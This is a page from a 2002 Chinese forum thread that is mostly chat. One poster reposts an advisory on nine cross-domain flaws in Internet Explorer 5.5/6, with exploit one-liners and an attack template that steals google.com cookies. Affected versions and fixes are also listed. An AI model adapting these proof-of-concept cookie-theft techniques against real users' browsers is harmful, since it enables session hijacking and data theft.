首页>休闲娱乐>疯狂灌水&& 人生 &&娱乐>庆祝两度回到顶级会员,放分9999,本月27日兑现
回复
« 返回列表
« 上一页 1... 28 29 30 31 32 33 34 ...35 下一页 »
atuhappy
atuhappy
驱动老牛
驱动老牛
  • 注册日期2002-03-15
  • 最后登录2009-09-09
  • 粉丝0
  • 关注0
  • 积分8分
  • 威望21点
  • 贡献值0点
  • 好评度0点
  • 原创分0分
  • 专家分0分
写私信
600楼#
发布于:2002-10-26 22:26
虽然引起这9个安全漏洞的都属于同类对象,但是它们中的每一个都是一个单独的漏洞,都可以单独用来进行恶意地攻击。这9个安全漏洞列于下表。其中每个安全漏洞的介绍包括三部分,\"Cache\"表示如何利用有缺陷的对象,\"Exploit\"表示在context中如何验证此缺陷,\"Impact\"表示此缺陷的安全威胁(\"Full access\"表示可以获得目标系统的完全控制权限,包括非法访问受害者的任意文件,伪造任意URL,非法执行任意指令)。

在一回首间,才忽然发现,原来,我一生的种种努力,不过只是为了要使周遭的人都对我满意而已。为了要博得他人的称许和微笑,我战战兢兢得将自己套入所有得模式,所有的桎梏。走到中途,才忽然发现,我只剩下一副模糊得面目,和一条不能回头的路...
回复(0) 喜欢(0)
atuhappy
atuhappy
驱动老牛
驱动老牛
  • 注册日期2002-03-15
  • 最后登录2009-09-09
  • 粉丝0
  • 关注0
  • 积分8分
  • 威望21点
  • 贡献值0点
  • 好评度0点
  • 原创分0分
  • 专家分0分
写私信
601楼#
发布于:2002-10-26 22:26
1. showModalDialog

Cache: var fVuln=oWin.showModalDialog;
Exploit - IE 5.5:
fVuln(\"javascript:alert(dialogArguments.document.cookie)\",oWin,\"\");
Exploit - IE 6: Not trivial but possible, by using our old \"analyze.dlg\"
vulnerability.
Impact: Full access in IE5.5, \"My Computer\" zone access in IE6.

在一回首间,才忽然发现,原来,我一生的种种努力,不过只是为了要使周遭的人都对我满意而已。为了要博得他人的称许和微笑,我战战兢兢得将自己套入所有得模式,所有的桎梏。走到中途,才忽然发现,我只剩下一副模糊得面目,和一条不能回头的路...
回复(0) 喜欢(0)
atuhappy
atuhappy
驱动老牛
驱动老牛
  • 注册日期2002-03-15
  • 最后登录2009-09-09
  • 粉丝0
  • 关注0
  • 积分8分
  • 威望21点
  • 贡献值0点
  • 好评度0点
  • 原创分0分
  • 专家分0分
写私信
602楼#
发布于:2002-10-26 22:27
2. external

Cache: var oVuln=oWin.external;
Exploit: oVuln.NavigateAndFind(\"javascript:alert(document.cookie)\",\"\",\"\");
Impact: Full access.
在一回首间,才忽然发现,原来,我一生的种种努力,不过只是为了要使周遭的人都对我满意而已。为了要博得他人的称许和微笑,我战战兢兢得将自己套入所有得模式,所有的桎梏。走到中途,才忽然发现,我只剩下一副模糊得面目,和一条不能回头的路...
回复(0) 喜欢(0)
atuhappy
atuhappy
驱动老牛
驱动老牛
  • 注册日期2002-03-15
  • 最后登录2009-09-09
  • 粉丝0
  • 关注0
  • 积分8分
  • 威望21点
  • 贡献值0点
  • 好评度0点
  • 原创分0分
  • 专家分0分
写私信
603楼#
发布于:2002-10-26 22:27
3. createRange

Cache: var fVuln=oWin.document.selection.createRange;
Exploit: fVuln().pasteHTML(\"<img
src=\\\"javascript:alert(document.cookie)\\\">\");
Impact: Full access.
在一回首间,才忽然发现,原来,我一生的种种努力,不过只是为了要使周遭的人都对我满意而已。为了要博得他人的称许和微笑,我战战兢兢得将自己套入所有得模式,所有的桎梏。走到中途,才忽然发现,我只剩下一副模糊得面目,和一条不能回头的路...
回复(0) 喜欢(0)
atuhappy
atuhappy
驱动老牛
驱动老牛
  • 注册日期2002-03-15
  • 最后登录2009-09-09
  • 粉丝0
  • 关注0
  • 积分8分
  • 威望21点
  • 贡献值0点
  • 好评度0点
  • 原创分0分
  • 专家分0分
写私信
604楼#
发布于:2002-10-26 22:28
4. elementFromPoint

Cache: var fVuln=oWin.document.elementFromPoint;
Exploit: alert(fVuln(1,1).document.cookie);
Impact: Full access.
在一回首间,才忽然发现,原来,我一生的种种努力,不过只是为了要使周遭的人都对我满意而已。为了要博得他人的称许和微笑,我战战兢兢得将自己套入所有得模式,所有的桎梏。走到中途,才忽然发现,我只剩下一副模糊得面目,和一条不能回头的路...
回复(0) 喜欢(0)
atuhappy
atuhappy
驱动老牛
驱动老牛
  • 注册日期2002-03-15
  • 最后登录2009-09-09
  • 粉丝0
  • 关注0
  • 积分8分
  • 威望21点
  • 贡献值0点
  • 好评度0点
  • 原创分0分
  • 专家分0分
写私信
605楼#
发布于:2002-10-26 22:28
5. getElementById

Cache: var fVuln=oWin.document.getElementById;
Exploit: alert(fVuln(\"ElementIdInNewDoc\").document.cookie);
Impact: Full access.

在一回首间,才忽然发现,原来,我一生的种种努力,不过只是为了要使周遭的人都对我满意而已。为了要博得他人的称许和微笑,我战战兢兢得将自己套入所有得模式,所有的桎梏。走到中途,才忽然发现,我只剩下一副模糊得面目,和一条不能回头的路...
回复(0) 喜欢(0)
atuhappy
atuhappy
驱动老牛
驱动老牛
  • 注册日期2002-03-15
  • 最后登录2009-09-09
  • 粉丝0
  • 关注0
  • 积分8分
  • 威望21点
  • 贡献值0点
  • 好评度0点
  • 原创分0分
  • 专家分0分
写私信
606楼#
发布于:2002-10-26 22:29
6. getElementsByName

Cache: var fVuln=oWin.document.getElementsByName;
Exploit: alert(fVuln(\"ElementNameInNewDoc\")[0].document.cookie);
Impact: Full access.
在一回首间,才忽然发现,原来,我一生的种种努力,不过只是为了要使周遭的人都对我满意而已。为了要博得他人的称许和微笑,我战战兢兢得将自己套入所有得模式,所有的桎梏。走到中途,才忽然发现,我只剩下一副模糊得面目,和一条不能回头的路...
回复(0) 喜欢(0)
atuhappy
atuhappy
驱动老牛
驱动老牛
  • 注册日期2002-03-15
  • 最后登录2009-09-09
  • 粉丝0
  • 关注0
  • 积分8分
  • 威望21点
  • 贡献值0点
  • 好评度0点
  • 原创分0分
  • 专家分0分
写私信
607楼#
发布于:2002-10-26 22:29
7. getElementsByTagName

Cache: var fVuln=oWin.document.getElementsByTagName;
Exploit: alert(fVuln(\"BODY\")[0].document.cookie);
Impact: Full access.

在一回首间,才忽然发现,原来,我一生的种种努力,不过只是为了要使周遭的人都对我满意而已。为了要博得他人的称许和微笑,我战战兢兢得将自己套入所有得模式,所有的桎梏。走到中途,才忽然发现,我只剩下一副模糊得面目,和一条不能回头的路...
回复(0) 喜欢(0)
atuhappy
atuhappy
驱动老牛
驱动老牛
  • 注册日期2002-03-15
  • 最后登录2009-09-09
  • 粉丝0
  • 关注0
  • 积分8分
  • 威望21点
  • 贡献值0点
  • 好评度0点
  • 原创分0分
  • 专家分0分
写私信
608楼#
发布于:2002-10-26 22:29
8. execCommand

Cache: var fVuln=oWin.document.execCommand;
Exploit: fVuln(\"SelectAll\"); fVuln(\"Copy\");
alert(clipboardData.getData(\"text\"));
Impact: Read access to the loaded document.
在一回首间,才忽然发现,原来,我一生的种种努力,不过只是为了要使周遭的人都对我满意而已。为了要博得他人的称许和微笑,我战战兢兢得将自己套入所有得模式,所有的桎梏。走到中途,才忽然发现,我只剩下一副模糊得面目,和一条不能回头的路...
回复(0) 喜欢(0)
atuhappy
atuhappy
驱动老牛
驱动老牛
  • 注册日期2002-03-15
  • 最后登录2009-09-09
  • 粉丝0
  • 关注0
  • 积分8分
  • 威望21点
  • 贡献值0点
  • 好评度0点
  • 原创分0分
  • 专家分0分
写私信
609楼#
发布于:2002-10-26 22:30
9. clipboardData

Cache: var oVuln=oWin.clipboardData;
Exploit: alert(oVuln.getData(\"text\")); or oVuln.setData(\"text\",\"data\");
Impact: Read/write access to the clipboard, regardless of settings.
在一回首间,才忽然发现,原来,我一生的种种努力,不过只是为了要使周遭的人都对我满意而已。为了要博得他人的称许和微笑,我战战兢兢得将自己套入所有得模式,所有的桎梏。走到中途,才忽然发现,我只剩下一副模糊得面目,和一条不能回头的路...
回复(0) 喜欢(0)
atuhappy
atuhappy
驱动老牛
驱动老牛
  • 注册日期2002-03-15
  • 最后登录2009-09-09
  • 粉丝0
  • 关注0
  • 积分8分
  • 威望21点
  • 贡献值0点
  • 好评度0点
  • 原创分0分
  • 专家分0分
写私信
610楼#
发布于:2002-10-26 22:30
受影响程序:
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 6.0
以前版本和IE6 SP1不受此缺陷影响

注意,任何使用IE浏览器引擎的其它应用程序也受此影响

在一回首间,才忽然发现,原来,我一生的种种努力,不过只是为了要使周遭的人都对我满意而已。为了要博得他人的称许和微笑,我战战兢兢得将自己套入所有得模式,所有的桎梏。走到中途,才忽然发现,我只剩下一副模糊得面目,和一条不能回头的路...
回复(0) 喜欢(0)
atuhappy
atuhappy
驱动老牛
驱动老牛
  • 注册日期2002-03-15
  • 最后登录2009-09-09
  • 粉丝0
  • 关注0
  • 积分8分
  • 威望21点
  • 贡献值0点
  • 好评度0点
  • 原创分0分
  • 专家分0分
写私信
611楼#
发布于:2002-10-26 22:31
测试平台:
==============
IE5.5 Win98
IE5.5 NT4
IE6 Win98
IE6 Win2000
IE6 WinXP

在一回首间,才忽然发现,原来,我一生的种种努力,不过只是为了要使周遭的人都对我满意而已。为了要博得他人的称许和微笑,我战战兢兢得将自己套入所有得模式,所有的桎梏。走到中途,才忽然发现,我只剩下一副模糊得面目,和一条不能回头的路...
回复(0) 喜欢(0)
atuhappy
atuhappy
驱动老牛
驱动老牛
  • 注册日期2002-03-15
  • 最后登录2009-09-09
  • 粉丝0
  • 关注0
  • 积分8分
  • 威望21点
  • 贡献值0点
  • 好评度0点
  • 原创分0分
  • 专家分0分
写私信
612楼#
发布于:2002-10-26 22:31
攻击方法:
利用下面代码可以非法获得受害者“google.com”的cookie

<script language=\"jscript\">
var oWin=open(\"blank.html\",\"victim\",\"width=100,height=100\");
[Cache line here]
location.href=\"http://google.com\";
setTimeout(
  function () {
   [Exploit line(s) here]
  },
  3000
);
</script>
在一回首间,才忽然发现,原来,我一生的种种努力,不过只是为了要使周遭的人都对我满意而已。为了要博得他人的称许和微笑,我战战兢兢得将自己套入所有得模式,所有的桎梏。走到中途,才忽然发现,我只剩下一副模糊得面目,和一条不能回头的路...
回复(0) 喜欢(0)
atuhappy
atuhappy
驱动老牛
驱动老牛
  • 注册日期2002-03-15
  • 最后登录2009-09-09
  • 粉丝0
  • 关注0
  • 积分8分
  • 威望21点
  • 贡献值0点
  • 好评度0点
  • 原创分0分
  • 专家分0分
写私信
613楼#
发布于:2002-10-26 22:31
解决方案:
禁止 Active Scripting

使用 IE6 SP1
在一回首间,才忽然发现,原来,我一生的种种努力,不过只是为了要使周遭的人都对我满意而已。为了要博得他人的称许和微笑,我战战兢兢得将自己套入所有得模式,所有的桎梏。走到中途,才忽然发现,我只剩下一副模糊得面目,和一条不能回头的路...
回复(0) 喜欢(0)
Buddha
Buddha
驱动老牛
驱动老牛
  • 注册日期2001-04-29
  • 最后登录2013-05-18
  • 粉丝0
  • 关注0
  • 积分2分
  • 威望17点
  • 贡献值0点
  • 好评度3点
  • 原创分0分
  • 专家分0分
写私信
614楼#
发布于:2002-10-27 01:14
还好还好,终于赶上了
<table style="filter: glow(color=sky blue, strength=10)"> <font color=white> 猫生病了, 老鼠大声朗诵诗集, 并修剪盆花. 猫生病了, 老鼠慢慢刷牙洗脸, 并打扫房间. 猫生病了, 老鼠倚在窗边欣赏夜色, 并对流星许愿. 猫生病了, 老鼠也病了, 它说:"我还是习惯那种时时紧张, 处处小心, 夜夜逃亡的生活." 午夜, 我听到老鼠在叹息, 且不再读诗了. </font></table>
回复(0) 喜欢(0)
逸飞
逸飞
驱动老牛
驱动老牛
  • 注册日期2001-10-01
  • 最后登录2005-10-01
  • 粉丝0
  • 关注0
  • 积分5分
  • 威望1点
  • 贡献值0点
  • 好评度0点
  • 原创分0分
  • 专家分0分
写私信
615楼#
发布于:2002-10-27 01:15
还好还好,终于赶上了

算你赶得及时 :D
忽然间,与你偶遇,慌乱的我不知所措,你含情脉脉的双眼使我无法回避,我明白你的心,我拼命跑开,你却紧紧相随。我哭喊着:“救命呀!谁家的狗没人管?”
回复(0) 喜欢(0)
Buddha
Buddha
驱动老牛
驱动老牛
  • 注册日期2001-04-29
  • 最后登录2013-05-18
  • 粉丝0
  • 关注0
  • 积分2分
  • 威望17点
  • 贡献值0点
  • 好评度3点
  • 原创分0分
  • 专家分0分
写私信
616楼#
发布于:2002-10-27 01:20
凑巧,凑巧而已,大家继续,继续
<table style="filter: glow(color=sky blue, strength=10)"> <font color=white> 猫生病了, 老鼠大声朗诵诗集, 并修剪盆花. 猫生病了, 老鼠慢慢刷牙洗脸, 并打扫房间. 猫生病了, 老鼠倚在窗边欣赏夜色, 并对流星许愿. 猫生病了, 老鼠也病了, 它说:"我还是习惯那种时时紧张, 处处小心, 夜夜逃亡的生活." 午夜, 我听到老鼠在叹息, 且不再读诗了. </font></table>
回复(0) 喜欢(0)
逸飞
逸飞
驱动老牛
驱动老牛
  • 注册日期2001-10-01
  • 最后登录2005-10-01
  • 粉丝0
  • 关注0
  • 积分5分
  • 威望1点
  • 贡献值0点
  • 好评度0点
  • 原创分0分
  • 专家分0分
写私信
617楼#
发布于:2002-10-27 01:22
凑巧,凑巧而已,大家继续,继续

呵呵,你就继续梦游吧,我可要吃宵夜去了 :D :D :D
另外,我不反刍 :D :D :D
忽然间,与你偶遇,慌乱的我不知所措,你含情脉脉的双眼使我无法回避,我明白你的心,我拼命跑开,你却紧紧相随。我哭喊着:“救命呀!谁家的狗没人管?”
回复(0) 喜欢(0)
Buddha
Buddha
驱动老牛
驱动老牛
  • 注册日期2001-04-29
  • 最后登录2013-05-18
  • 粉丝0
  • 关注0
  • 积分2分
  • 威望17点
  • 贡献值0点
  • 好评度3点
  • 原创分0分
  • 专家分0分
写私信
618楼#
发布于:2002-10-27 01:23
去吧去吧,别噎者
<table style="filter: glow(color=sky blue, strength=10)"> <font color=white> 猫生病了, 老鼠大声朗诵诗集, 并修剪盆花. 猫生病了, 老鼠慢慢刷牙洗脸, 并打扫房间. 猫生病了, 老鼠倚在窗边欣赏夜色, 并对流星许愿. 猫生病了, 老鼠也病了, 它说:"我还是习惯那种时时紧张, 处处小心, 夜夜逃亡的生活." 午夜, 我听到老鼠在叹息, 且不再读诗了. </font></table>
回复(0) 喜欢(0)
逸飞
逸飞
驱动老牛
驱动老牛
  • 注册日期2001-10-01
  • 最后登录2005-10-01
  • 粉丝0
  • 关注0
  • 积分5分
  • 威望1点
  • 贡献值0点
  • 好评度0点
  • 原创分0分
  • 专家分0分
写私信
619楼#
发布于:2002-10-27 09:14
放分的日子没人来? :(
忽然间,与你偶遇,慌乱的我不知所措,你含情脉脉的双眼使我无法回避,我明白你的心,我拼命跑开,你却紧紧相随。我哭喊着:“救命呀!谁家的狗没人管?”
回复(0) 喜欢(0)
上一页
游客

关于phpwind联系我们问题反馈程序建议

Powered by phpwind v9.0.2 ©2003-2015 phpwind.com 京ICP备05006834号

返回顶部